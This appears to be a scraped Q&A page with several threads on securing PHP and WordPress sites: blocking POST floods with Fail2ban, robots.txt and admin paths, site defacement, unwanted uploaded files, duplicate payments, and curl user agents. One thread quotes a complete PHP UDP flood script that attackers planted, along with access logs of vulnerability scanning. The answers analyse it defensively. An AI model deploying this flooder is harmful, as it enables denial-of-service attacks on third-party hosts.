Blocking HTTP POST attack via mod_rewrite - php

I have a WordPress site that is being attacked with the following HTTP POST requests:
x.x.x.x - - [15/Jul/2013:01:26:52 -0400] "POST /?CtrlFunc_stttttuuuuuuvvvvvwwwwwwxxxxxyy HTTP/1.1" 200 23304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
x.x.x.x - - [15/Jul/2013:01:26:55 -0400] "POST / HTTP/1.1" 200 23304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
The attack itself isn't bad enough to bring down Apache, but it does drive up the CPU usage more than I'd like it to. I would therefore like to block these using mod_rewrite -- straight to a 403 page should do it -- but I've not had any luck so far with anything I've tried. I would like to block all blank HTTP POST requests (to /) as well as /?CtrlFunc_*
What I've done as a workaround for now is block all HTTP POST traffic but that won't work long-term.
Any ideas? I've invested several hours on this and have not made much progress.
Thanks!

Instead of blocking the request via mod_rewrite, I'd use it as bait to record the IP of the offenders. Then, adding them to a 96 hour black list within your firewall will block all requests from them.
See Fail2ban.
Specifically, I believe that Fail2ban filters are the right place to start looking to write your url-specific case.
http://www.fail2ban.org/wiki/index.php/MANUAL_0_8#Filters
http://www.fail2ban.org/wiki/index.php/HOWTO_apache_myadmin_filter

Here's is a Fail2ban blog post that creates a filter for this POST attack.

Related

is there a reason to not put my admin directory in robots.txt?

This may have been asked and answered, since I'm not sure what is the best way to phrase this.
I want to ensure that search spiders don't index the admin side of my website. Unfortunately, if I put the path into my robots.txt file, I'm handing over the cookie jar. Thankfully it's locked, though.
I've already had quite a few "visitors" who start by grabbing robots.txt. Obviously, non-legit spiders will ignore robots.txt, but I want to prevent Google and Bing from plastering my admin directory in search results.
My admin directory is not called "admin" (the most common SBO tactic)
Directory browsing is already blocked
Any IP who connects to my admin directory without logging in first with appropriate permissions is blacklisted. I have been monitoring, and have only had a couple of legit spiders get blacklisted by this manner
I'm using .htaccess (merging several public blacklists) and PHP blacklisting based on behaviors (some automatic, but still Mark-I eyeball as well)
All actions on the admin side are auth-based
The only links to the admin side are presented to authorized users with the appropriate permissions.
I'm not sure if I should put the admin directory in robots.txt - On one hand, legit spiders will ignore that directory, but on the other, I'm telling those who want to do harm that directory exists, and I don't want prying eyes...
I want to ensure that search spiders don't index the admin side of my website. Unfortunately, if I put the path into my robots.txt file, I'm handing over the cookie jar. Thankfully it's locked, though.
You rightly recognize the conundrum. If you put the admin url in the robots.txt, then well-behaved bots will stay away. On the other hand, you are basically telegraphing to bad folks where the soft spots are.
If you inspect your web server's access log, you will most likely see a LOT of requests for admin-type pages. For instance, looking at the apache log on one of my servers, I see opportunistic script kiddies searching for wordpress, phpmyadmin, etc:
109.98.109.101 - - [24/Jan/2019:08:48:36 -0600] "GET /wpc.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:36 -0600] "GET /wpo.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:37 -0600] "GET /wp-config.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:43 -0600] "POST /wp-admins.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
109.98.109.101 - - [24/Jan/2019:08:50:01 -0600] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36
109.98.109.101 - - [24/Jan/2019:08:48:39 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:39 -0600] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:49:35 -0600] "GET /phpmyadmin/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
109.98.109.101 - - [24/Jan/2019:08:49:47 -0600] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
109.98.109.101 - - [24/Jan/2019:08:49:47 -0600] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
My access log has thousands upon thousands of these. Bots search for them all the time and none of these files are listed in my robots.txt file. As you might guess, unless you have an admin url that is really randomly named, the bad guys could very well guess its name is /admin.
I've already had quite a few "visitors" who start by grabbing robots.txt. Obviously, non-legit spiders will ignore robots.txt, but I want to prevent Google and Bing from plastering my admin directory in search results.
I'd strongly recommend spending some time banning bad bots or basically any bots that you have no use for. AHrefsBot & SemRushBot come to mind. It shouldn't be too hard to find bad bot lists but you'll need to evaluate any list you find to make sure it isn't blocking bots you want to serve. In addition to adding an exclusion rule to your robots.txt file, you should probably configure your application to ban bad bots by sending a 403 forbidden or 404 gone or other HTTP response code of your choice.
In the end, it's critical to remember the maxim that "security by obscurity is not security". One of the most important principles of encryption and security is Kerckhoff's Principle -- i.e., "the enemy knows the system." Your site should not not just rely on the location of your admin urls being obscure or secret. You must require authentication and use sound best practices in your authentication code. I would not rely on apache authentication but would instead code my web application to accept user login/password in a securely-hosted form (use HTTPS) and I would store only the hashed form of those passwords. Do not store cleartext passwords ever.
In the end, the security of your system is only as good as the weakest link. There is some value to having a unique or unusual admin because you might be exposed to fewer attacks, but this in itself doesn't provide any real security. If you still have reservations about broadcasting this url in your robots.txt file, perhaps weigh that against the problems you might expect if GoogleBot or BingBot or some other friendly bot starts stomping around in your admin urls. Would it bother you if these urls ended up in the google search index?

shared hosting at godaddy hacked index.php and login.php automatically changed

yesterday many web application that i have hosted at godaddy shared hosting got defaced (hacked). They changed the index.php and login.php to follwing source code :
Deface By black sQl
HACKED BY black sQl
WARNING!!!
Lets start to secure your website
But Remember This SECUIRITY IS AN ILLUSION!! BD Black Hackers Cyber Army black sql::!hR V1Ru5::3lack D4G0N::TLM-V1Ru5
i donot know how they did that as it is just the login page there is no usage of get and the username and password are only the fields the user can input and they are also cleaned before they enter any function.
i checked the raw access logs and found some suspicious entries there. those are as following :
46.118.158.19 - - [29/Sep/2017:06:27:29 -0700] "GET / HTTP/1.1" 200 522 "http://pochtovyi-index.ru/" "Opera/8.00 (Windows NT 5.1; U; en)"
188.163.72.15 - - [29/Sep/2017:06:48:37 -0700] "GET / HTTP/1.1" 200 522 "https://educontest.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
can anybody help me how to secure this kind of intrusion?
It depends on how he has gained access.
Major steps to take into consideration are:
Restricting access to server using htaccess
use PDO, to make apps secure from SQL Injection
Secure your apps with CSRF tokens
etc. Check this All in one Cheat Sheet

Wordpress Site or Server getting hacked with huge amount of php and html files uploaded

I am having a big issue with a person that is uploading files without my permission on the root of my website. I have tried
blocking the ip's, updating wordpress (4.1.1)
adding a plugin like better wp security and configured it correctly
removing each file that he uploaded and still I am getting hundreds of files every hour, what could it be. The log looks like this:
Changing permissions of public ftp to 750.
This is the log
112.6.228.87 - - [13/Apr/2015:13:40:13 +0100] "GET /ctioVp.php?host=37.157.198.94&port=8888&time=90&rat=0&len=65536 HTTP/1.1" 404 10352 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
61.152.102.40 - - [13/Apr/2015:13:40:19 +0100] "GET /aaadqm/6204-imvh.html HTTP/1.0" 200 12107 "http://.co.uk/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
95.158.139.48 - - [13/Apr/2015:13:40:43 +0100] "GET /aaadqm/6204-imvh.html HTTP/1.1" 200 12107 "http://.co.uk/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
95.158.139.48 - - [13/Apr/2015:13:40:43 +0100] "GET /aaadqm/9970-ywek.html HTTP/1.1" 200 12347 "http://.co.uk/aaadqm/6204-imvh.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
And there are more ip's (static) and more files and folders. I am hosting on my own the website and have WHM and Cpanel.
ctioVp.php looks like this:
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = $_GET['len'];
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0)
{
if (StrLen($_GET['rat'])<>0)
{
echo php_uname();
exit;
}
exit;
}
for($i=0; $i < $Sendlen; $i++)
{
$out .= "A";
}
$max_time = time() + $exec_time;
while(1)
{
if(time() > $max_time)
{
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
And the rest of the files are html files with Chinese content.
The Script you've posted is used to flood a given server with UDP packages (aka DDOS).
The Problem with a compromised server is that you don't know what the attacker did. Maybe he installed a root kit or something alike.
The only safe way to recover from this is to take the server offline, and start over with a non compromised backup.
See also https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server
I agree that the best way to recover is restore a full server backup, but in this instance, I think it's unlikely that the server itself was compromised, since it'll require a privilege escalation vulnerability in apache or other components. The most likely cause is a vulnerability in Wordpress.
Reinstalling a clean site backup (both files and database) is the best method for getting rid of malicious content. Whether you go for full server restore, WP restore or file cleanup, you still have to take care of the root cause. Alongside what you already did you should:
Change your passwords.
Update all your plugins and themes, which are often overlooked but also are attack vectors, since they can bundle vulnerable components.
wpvulndb.com might help identify those.

Payment queuing system for PHP

I'm trying to figure out the best way to handle payment processing to prevent duplicate payment submissions. I'm using PHP (specifically CakePHP 2.3.8) with Balanced Payments to handle the payment processing.
I've noticed on my server logs that I've had multiple requests submitted all within a second for something usually related to wordpress or phpmyadmin, such as
ip.address.here - [08/Jul/2014:15:03:12 -0400] "GET / HTTP/1.1" 302 320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
ip.address.here - [08/Jul/2014:15:03:12 -0400] "GET / HTTP/1.1" 302 320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
ip.address.here - [08/Jul/2014:15:03:12 -0400] "GET / HTTP/1.1" 302 320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
ip.address.here - [08/Jul/2014:15:03:13 -0400] "GET / HTTP/1.1" 302 320 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
I'm worried about someone trying something similar (accidental or not) but with a payment. What is the most effective way to handle a situation like above where multiple requests come in very quickly, regardless if it's a "hacker" or just a hiccup in the system? If I use a queuing system like this one, speficially for CakePHP how would I keep track of previously processed entries in order to detect duplicate submissions?
Say I have a queue of 3 entries. While processing entry 1 would I check entry 2 and 3 to make sure they're not duplicate information? If they are, then just delete them?
In my experience, you should just save a Session identifier that stays the same until the transaction has finished or has been canceled. Usually the payment gateway takes that session identifier to check that you're not duplicating the transaction.
Also, the Payment Gateway should detect duplicates (i.e. same card info, same amount in a short period of time) and will return an error back to you, letting you know what happened.
So, you just remember to keep track of your unique id and reset it when the transaction is completed. If your're keeping a shopping bag, and that expires, make the transaction id expire at that same time. And finally, make sure to disable the submit button with javascript so the users don't tap it more than once.

Changing the user-agent

Well, I have the following problem. I made a tool that checks the status of a website.
For example if I enter www.youtube.com it will say
http://www.youtube.com HTTP/1.0 200 OK
and for a website with a redirect it will say:
http://www.imgur.com HTTP/1.1 302 Moved Temporarily
http://imgur.com/ HTTP/1.1 200 OK
Alright, this works just as it should, however I would like to make it so that you can select the user-agent. So for example Android or something. Because youtube on android will redirect to m.youtube.com
I made a dropdownlist already with different user-agents and now what I don't know is how to change a user-agent. When I search google it just gives me browser plugins or addons.
I hope someone knows of a way to do this.
Thanks in advance!
You can send a CURL request and change the user agent like this.
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');

Categories